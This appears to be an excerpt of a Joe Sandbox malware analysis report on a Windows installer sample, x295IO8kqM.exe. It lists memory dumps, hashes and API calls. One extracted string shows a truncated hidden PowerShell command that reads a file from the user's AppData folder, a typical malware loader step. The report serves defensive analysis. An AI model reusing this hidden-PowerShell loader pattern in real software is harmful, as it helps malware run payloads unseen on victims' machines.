                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                                  • Instruction ID: 8bd9da501ed45a7f5d2d0dfc2be718583217048081f6288eced8fd4e99326474
                                                  • Opcode Fuzzy Hash: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                                  • Instruction Fuzzy Hash: D3913370D00229CBDF28CFA8C854BADBBB1FF44305F15812AD816BB291C7795A96CF84
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                                  • Instruction ID: cc0f6ab454a14bc981dfc54755cdbe6dc6b21fe19783e5e5045ac21e9f873034
                                                  • Opcode Fuzzy Hash: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                                  • Instruction Fuzzy Hash: 57813271E00229CBDB24CFA8C844BADBBB1FF45305F25816AD816BB291C7789A95CF54
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                                  • Instruction ID: 36932640a45318c75a18aff77ab64511548531c3f0ac059ca6f487157756e1a6
                                                  • Opcode Fuzzy Hash: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                                  • Instruction Fuzzy Hash: DB816831D04229DBDB24CFA8D8447ADBBB0FF44305F15816AE856BB2C0C7785A96CF44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
                                                  • Instruction ID: ff2225f7ed94bd6a4cfd13171a87750c77ef90a01ce87bb0bc5953b87d28885c
                                                  • Opcode Fuzzy Hash: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
                                                  • Instruction Fuzzy Hash: F3712271E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB281C7795A96DF54
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
                                                  • Instruction ID: 52dfaafe50a83d16d2aca4474dbfbf9792b45fca5ae70f0232ed595026c100c8
                                                  • Opcode Fuzzy Hash: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
                                                  • Instruction Fuzzy Hash: E7713371E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB291C7795A96DF44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
                                                  • Instruction ID: fadc0c566b3b685b80e6fde1c1dc985280178bf592964274442c35b5c3ef9333
                                                  • Opcode Fuzzy Hash: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
                                                  • Instruction Fuzzy Hash: 1D713571E00229DBDF28CF98C844BADBBB1FF44305F15806AD816BB291C7799A96DF44
                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 00401BA7
                                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BB9
                                                  Strings
                                                  • "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Declarative.U, xrefs: 00401B5E, 00401B64, 00401B7E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree
                                                  • String ID: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Declarative.U
                                                  • API String ID: 3394109436-4271710569
                                                  • Opcode ID: 1e4a5162af435751432e6e7f2dba97d226f4d9e1c95c10189c3a7610031c837c
                                                  • Instruction ID: 92ea0690437fa8f145506ea4d9625389eaa327d8cc6974590e314eb6964df5ff
                                                  • Opcode Fuzzy Hash: 1e4a5162af435751432e6e7f2dba97d226f4d9e1c95c10189c3a7610031c837c
                                                  • Instruction Fuzzy Hash: 9121A172600100EBDB20EF94CD8499AB3B9EB84328724403BF102F72D1DBBCA8119F6D
                                                  APIs
                                                    • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                  • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                  • RegCloseKey.ADVAPI32(?,?,?,0040A5A8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: Enum$CloseOpenValue
                                                  • String ID:
                                                  • API String ID: 167947723-0
                                                  • Opcode ID: 869fca893966c35f5f9dd4cef90ba22e65e9eead4cbee230d36187a62b4b894f
                                                  • Instruction ID: d64a4e9cdb2ebe95b75baf9652326c22c9046eba0d0166e80e40b654e8099a4c
                                                  • Opcode Fuzzy Hash: 869fca893966c35f5f9dd4cef90ba22e65e9eead4cbee230d36187a62b4b894f
                                                  • Instruction Fuzzy Hash: 16F06D72A04204ABE7209F659E88ABF766DEF80354B10843AF505B61D0D6B85D419B6A
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: b5ca2ebfc38e8c40cc9dd1a42e0f544b2ed62ef4447f49d6c3b0efbc094499f8
                                                  • Instruction ID: 40f3ddd491d249f73d2fb4fc43cce1b0e50519406e0a546e2fe7b43c981aace9
                                                  • Opcode Fuzzy Hash: b5ca2ebfc38e8c40cc9dd1a42e0f544b2ed62ef4447f49d6c3b0efbc094499f8
                                                  • Instruction Fuzzy Hash: 2801D131B24210ABE7295B389D05B2A3698E710314F10863EB911F62F1DA78DC138B4D
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 0040525C
                                                    • Part of subcall function 0040412A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                                  • CoUninitialize.COMBASE(00000404,00000000), ref: 004052A8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: InitializeMessageSendUninitialize
                                                  • String ID:
                                                  • API String ID: 2896919175-0
                                                  • Opcode ID: e510a8554f72ac42c1e77e5b880e55181332485b1ec9c5f6942f04f593ee2aa3
                                                  • Instruction ID: d190f16cb00a78a8791a8665c172551021538f6a88e76c08847af4d92639a026
                                                  • Opcode Fuzzy Hash: e510a8554f72ac42c1e77e5b880e55181332485b1ec9c5f6942f04f593ee2aa3
                                                  • Instruction Fuzzy Hash: 99F0F072A05600EBDB209B54AD01B5773A4EFD4301F0548BEFE44B72A1E7788C028E6D
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: ShowWindow
                                                  • String ID:
                                                  • API String ID: 1268545403-0
                                                  • Opcode ID: 4b08649e2767e153eb05ad833bbe1713a4ba0a3d3c758775f708b13ea380d49e
                                                  • Instruction ID: 14d99bf0b22e04dc8d6d27e1a0bb6c10309fac34fbb9e600a12b00824ffe684e
                                                  • Opcode Fuzzy Hash: 4b08649e2767e153eb05ad833bbe1713a4ba0a3d3c758775f708b13ea380d49e
                                                  • Instruction Fuzzy Hash: 5EE04F32B001049BCB24CBA8ED808AE77A6AB88320750453FD902B36A0CA74DC51CF28
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                    • Part of subcall function 00406384: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
                                                    • Part of subcall function 00406384: wsprintfW.USER32 ref: 004063D6
                                                    • Part of subcall function 00406384: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004063EA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: a18958032a131606469e198625683324ecaa140be52d037ed0b096a6b0eca255
                                                  • Instruction ID: 5dc38b7c1614d08ea85e9237aecc352f838a6b2874e2c17184f6d3a6923fef4e
                                                  • Opcode Fuzzy Hash: a18958032a131606469e198625683324ecaa140be52d037ed0b096a6b0eca255
                                                  • Instruction Fuzzy Hash: 02E086326081225BD31157715D4497776A8AA9D640306043EFD06F61C1D774AC219AAD
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00000003,00402E2E,00437800,80000000,00000003,?,?,"C:\Users\user\Desktop\x295IO8kqM.exe",00403500,?), ref: 00405BF3
                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\x295IO8kqM.exe",00403500,?), ref: 00405C15
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 742792ff7842fdd919adb4f35d156b5e8b6622b1384091bd21e9a064bfd9155a
                                                  • Instruction ID: be88a92cb82447fd1599dbd49a9896cb6db060ceaa3ec03b2970cb079924df1d
                                                  • Opcode Fuzzy Hash: 742792ff7842fdd919adb4f35d156b5e8b6622b1384091bd21e9a064bfd9155a
                                                  • Instruction Fuzzy Hash: FDD09E71658201AFEF098F20DE16F2E7AA2EB84B00F10562CB642940E0D6B15815DB16
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,?,004057CF,?,?,00000000,004059A5,?,?,?,?), ref: 00405BCF
                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405BE3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 12e66bcdd04e2879fdb80b2c332070aab0449f7c07d3bd30d589cafb4efe0379
                                                  • Instruction ID: fe509d3f362e3f7859bf4bbc37f15f2155ec7d75e112c9803890ba7330917acd
                                                  • Opcode Fuzzy Hash: 12e66bcdd04e2879fdb80b2c332070aab0449f7c07d3bd30d589cafb4efe0379
                                                  • Instruction Fuzzy Hash: A6D01272908121AFC2102738EE0C89FBFA5EB543717054B31F979A22F0C7305C52CA95
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,00000000,0040325D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004056CB
                                                  • GetLastError.KERNEL32 ref: 004056D9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
